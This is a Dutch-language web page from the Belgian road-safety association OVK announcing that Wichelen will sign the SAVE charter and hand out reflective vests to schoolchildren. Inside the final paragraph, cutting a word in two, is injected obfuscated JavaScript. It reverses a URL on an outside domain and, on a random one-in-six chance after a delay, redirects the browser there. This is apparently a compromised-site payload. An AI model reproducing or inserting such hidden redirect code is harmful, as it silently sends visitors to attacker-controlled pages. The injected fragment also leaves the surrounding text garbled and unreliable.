Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Wichelen ondertekent SAVE-charter

Op vrijdag 8 november ondertekent de gemeente Wichelen het SAVE-charter. Wichelen is hiermee de laatste gemeente van de politiezone Wetteren, Laarne, Wichelen die het charter ondertekent. De politiezone scoort hier dan ook een primeur in de geschiedenis van SAVE Steden & Gemeenten.

De ondertekening zal plaatsvinden in de gemeenteschool afdeling ‘De Rozelaar’ Serskamp, Schoolstraat 4 te Wichelen.

Gekoppeld aan de ondertekening en met de donkere dagen in het vooruitzicht, zal de gemeente  fluohesjes uitdelen aan de eerste leerjaren van de scholen en rugzakovertrekken aan de leerlingen van het vijfde leerjaar. Deze actie komt er door de samenwerking tussen de gemeente  en de lokale politie.

Jullie zijn uiteraard hartelijk uitgenodigd deze ondertekening bij te wonen, die voor Wichelen het startpunt van het belangrijkere werk betekent, te beginnen met de opstelling van een actieplan waarvan de uitvoering op termijn moet uitmonden in de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toekenning van het SAVE-label.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be